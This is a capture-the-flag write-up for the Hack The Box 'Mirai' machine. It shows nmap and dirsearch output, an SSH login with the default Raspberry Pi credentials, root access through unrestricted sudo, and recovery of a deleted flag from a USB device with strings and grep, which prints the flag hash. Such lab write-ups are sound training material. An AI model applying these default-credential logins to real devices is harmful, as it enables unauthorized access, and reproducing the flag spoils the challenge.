HTB - Mirai

Mirai

Getting Root:

1. The box reveals that is running pi-hole which is basically an application designed for use on embedded devices such as the raspberry-pi

2. We can ssh to the box using the raspberry-pi default credentials and noticed we have full access privileges using sudo.

Tools Used:

nmap, dirsearch.py, ssh, grep

Nmap:

# Nmap 7.80 scan initiated Tue Mar 31 17:15:24 2020 as: nmap -sC -sV -p- -oA nmap/Mirai.allports 10.10.10.48  
Nmap scan report for 10.10.10.48
Host is up (0.042s latency).
Not shown: 65529 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
| ssh-hostkey: 
|   1024 aa:ef:5c:e0:8e:86:97:82:47:ff:4a:e5:40:18:90:c5 (DSA)
|   2048 e8:c1:9d:c5:43:ab:fe:61:23:3b:d7:e4:af:9b:74:18 (RSA)
|   256 b6:a0:78:38:d0:c8:10:94:8b:44:b2:ea:a0:17:42:2b (ECDSA)
|_  256 4d:68:40:f7:20:c4:e5:52:80:7a:44:38:b8:a2:a7:52 (ED25519)
53/tcp    open  domain  dnsmasq 2.76
| dns-nsid: 
|_  bind.version: dnsmasq-2.76
80/tcp    open  http    lighttpd 1.4.35
|_http-server-header: lighttpd/1.4.35
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
1771/tcp  open  upnp    Platinum UPnP 1.0.5.13 (UPnP/1.0 DLNADOC/1.50)
32400/tcp open  http    Plex Media Server httpd
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Server returned status 401 but no WWW-Authenticate header.
|_http-cors: HEAD GET POST PUT DELETE OPTIONS
|_http-title: Unauthorized
32469/tcp open  upnp    Platinum UPnP 1.0.5.13 (UPnP/1.0 DLNADOC/1.50)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Mar 31 17:16:05 2020 -- 1 IP address (1 host up) scanned in 40.63 seconds

Enumeration

HTTP - Port 80

# dirsearch.py -u http://10.10.10.48 -E -t 30
[sudo] password for kali: 

 _|. _ _  _  _  _ _|_    v0.3.9
(_||| _) (/_(_|| (_| )

Extensions: php, asp, aspx, jsp, js, html, do, action | HTTP method: get | Threads: 30 | Wordlist size: 8674 

Error Log: /opt/dirsearch/logs/errors-20-03-31_23-28-43.log

Target: http://10.10.10.48

[23:28:43] Starting: 
[23:28:47] 301 -    0B  - /admin  ->  http://10.10.10.48/admin/
[23:28:47] 200 -   14KB - /admin/
[23:28:47] 200 -   14KB - /admin/?/login
[23:28:47] 200 -   14KB - /admin/index.php

Task Completed
kali@oscp:~/HackTheBox/Mirai$ 

Checking /admin

A basic google search on raspberry pi default credentials shows: Username: pi Password: raspberry

Getting Access

# ssh pi@10.10.10.48
The authenticity of host '10.10.10.48 (10.10.10.48)' can't be established.
ECDSA key fingerprint is SHA256:UkDz3Z1kWt2O5g2GRlullQ3UY/cVIx/oXtiqLPXiXMY.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.48' (ECDSA) to the list of known hosts.
pi@10.10.10.48's password: 

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Aug 27 14:47:50 2017 from localhost

SSH is enabled and the default password for the 'pi' user has not been changed.
This is a security risk - please login as the 'pi' user and type 'passwd' to set a new password.


SSH is enabled and the default password for the 'pi' user has not been changed.
This is a security risk - please login as the 'pi' user and type 'passwd' to set a new password.

pi@raspberrypi:~ $ id
uid=1000(pi) gid=1000(pi) groups=1000(pi),4(adm),20(dialout),24(cdrom),27(sudo),29(audio),44(video),46(plugdev),60(games),100(users),101(input),108(netdev),117(i2c),998(gpio),999(spi)
pi@raspberrypi:~ $ 

Privilege Escalation

sudo -l
Matching Defaults entries for pi on localhost:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User pi may run the following commands on localhost:
    (ALL : ALL) ALL
    (ALL) NOPASSWD: ALL

Root

pi@raspberrypi:~ $ sudo su -

SSH is enabled and the default password for the 'pi' user has not been changed.
This is a security risk - please login as the 'pi' user and type 'passwd' to set a new password.


SSH is enabled and the default password for the 'pi' user has not been changed.
This is a security risk - please login as the 'pi' user and type 'passwd' to set a new password.

root@raspberrypi:~# id
uid=0(root) gid=0(root) groups=0(root)
root@raspberrypi:~# 

Missing Flag

root@raspberrypi:~# ls -la
total 22
drwx------  3 root root 4096 Aug 27  2017 .
drwxr-xr-x 35 root root 4096 Aug 14  2017 ..
-rw-------  1 root root  549 Dec 24  2017 .bash_history
-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
-rw-r--r--  1 root root  140 Nov 19  2007 .profile
-rw-r--r--  1 root root   76 Aug 14  2017 root.txt
drwx------  2 root root 4096 Aug 27  2017 .ssh
root@raspberrypi:~# cat root.txt 
I lost my original root.txt! I think I may have a backup on my USB stick...
root@raspberrypi:~# 

It said that a backup of the root flag may be on a USB stick, so we checked for mounted devices and noticed /media/usbstick

root@raspberrypi:~# df -hT
Filesystem     Type      Size  Used Avail Use% Mounted on
aufs           aufs      8.5G  2.8G  5.3G  35% /
tmpfs          tmpfs     100M  4.8M   96M   5% /run
/dev/sda1      iso9660   1.3G  1.3G     0 100% /lib/live/mount/persistence/sda1
/dev/loop0     squashfs  1.3G  1.3G     0 100% /lib/live/mount/rootfs/filesystem.squashfs
tmpfs          tmpfs     250M     0  250M   0% /lib/live/mount/overlay
/dev/sda2      ext4      8.5G  2.8G  5.3G  35% /lib/live/mount/persistence/sda2
devtmpfs       devtmpfs   10M     0   10M   0% /dev
tmpfs          tmpfs     250M  8.0K  250M   1% /dev/shm
tmpfs          tmpfs     5.0M  4.0K  5.0M   1% /run/lock
tmpfs          tmpfs     250M     0  250M   0% /sys/fs/cgroup
tmpfs          tmpfs     250M  8.0K  250M   1% /tmp
/dev/sdb       ext4      8.7M   93K  7.9M   2% /media/usbstick
tmpfs          tmpfs      50M     0   50M   0% /run/user/999
tmpfs          tmpfs      50M     0   50M   0% /run/user/1000

But there was nothing there.

root@raspberrypi:~# cd /media/usbstick/
root@raspberrypi:/media/usbstick# ls -la
total 18
drwxr-xr-x 3 root root  1024 Aug 14  2017 .
drwxr-xr-x 3 root root  4096 Aug 14  2017 ..
-rw-r--r-- 1 root root   129 Aug 14  2017 damnit.txt
drwx------ 2 root root 12288 Aug 14  2017 lost+found
root@raspberrypi:/media/usbstick# cat damnit.txt 
Damnit! Sorry man I accidentally deleted your files off the USB stick.
Do you know if there is any way to get them back?

-James
root@raspberrypi:/media/usbstick# 

Doing some forensics on the /dev/sdb device showed some interesting pieces of data such as root.txt and what it looked like a hash . In Linux everything is a file, so a simple use of strings and grep did the job.

root@raspberrypi:~# strings /dev/sdb 
>r &
/media/usbstick
lost+found
root.txt
damnit.txt
>r &
>r &
/media/usbstick
lost+found
root.txt
damnit.txt
>r &
/media/usbstick
2]8^
lost+found
root.txt
damnit.txt
>r &
3d3e483143ff12ec505d026fa13e020b
Damnit! Sorry man I accidentally deleted your files off the USB stick.
Do you know if there is any way to get them back?
-James


OR

root@raspberrypi:~# egrep -a "([a-z0-9]){32}" /dev/sdb 
|}*,.+-3d3e483143ff12ec505d026fa13e020b
root@raspberrypi:~#